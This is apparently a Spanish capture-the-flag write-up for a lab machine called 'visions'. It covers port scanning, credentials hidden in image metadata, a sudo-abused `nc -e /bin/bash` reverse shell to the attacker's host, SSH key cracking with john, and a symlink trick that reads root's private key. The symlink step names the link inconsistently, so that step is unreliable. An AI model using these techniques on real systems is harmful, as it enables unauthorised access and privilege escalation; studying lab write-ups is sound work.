Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.119
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.119
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-30 14:22 -04
Nmap scan report for 192.168.1.119
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 85:d0:93:ff:b6:be:e8:48:a9:2c:86:4c:b6:84:1f:85 (RSA)
| 256 5d:fb:77:a5:d3:34:4c:46:96:b6:28:a2:6b:9f:74:de (ECDSA)
|_ 256 76:3a:c5:88:89:f2:ab:82:05:80:80:f9:6c:3b:20:9d (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.73 secondsEl código del sitio tiene una pista sobre lo "invisible" y una imagen:
<!--
Only those that can see the invisible can do the imposible.
...
-alicia -->
<img src="white.png" />En los datos EXIF de la imagen hay una contraseña, y con aperisolve descubrimos otras credenciales:
❯ exiftool white.png
...
Comment: pw:ihaveadream
...# aperisolve.com → sophia/seemstobeimpossibleIniciamos sesión por SSH como alicia:
❯ ssh alicia@192.168.1.119
alicia@192.168.1.119's password: ihaveadream
alicia@visions:~$La escalada es una cadena de usuarios. Primero, alicia puede ejecutar nc como emma:
alicia@visions:/home$ sudo -l
...
User alicia may run the following commands on visions:
(emma) NOPASSWD: /usr/bin/nc
alicia@visions:/home$ sudo -u emma nc -e /bin/bash 192.168.1.3 1234 &>/dev/null & disown
❯ ncat -nlvp 1234
Ncat: Connection from 192.168.1.119:55442.
emma@visions:/home$Con las credenciales de aperisolve cambiamos a sophia y obtenemos la flag:
alicia@visions:/tmp$ su sophia
Password: seemstobeimpossible
sophia@visions:/tmp$sophia puede ejecutar cat (como cualquier usuario) sobre un archivo concreto de isabella:
sophia@visions:~$ sudo -l
...
User sophia may run the following commands on visions:
(ALL : ALL) NOPASSWD: /usr/bin/cat /home/isabella/.invisible
sophia@visions:~$ sudo -u isabella /usr/bin/cat /home/isabella/.invisible
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----Crackeamos la passphrase de esa clave con john y accedemos como isabella:
❯ /opt/john/run/ssh2john.py id_rsa_isabella > hash
❯ /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
invisible (id_rsa_isabella)
...Como isabella controla el archivo .invisible, lo reemplazamos por un symlink a la id_rsa de root. Luego, desde sophia, el sudo cat (que se ejecuta como root) leerá la clave de root a través del enlace:
isabella@visions:~$ mv .invisible .invisible_old
isabella@visions:~$ ln -s /root/.ssh/id_rsa .invisible_old
sophia@visions:~$ sudo -u root /usr/bin/cat /home/isabella/.invisible
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----Nos conectamos como root con esa clave:
❯ chmod 600 id_rsa_root
❯ ssh root@192.168.1.119 -i id_rsa_root
Linux visions 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
...
root@visions:~#Obtenemos nuestra flag.
Fin.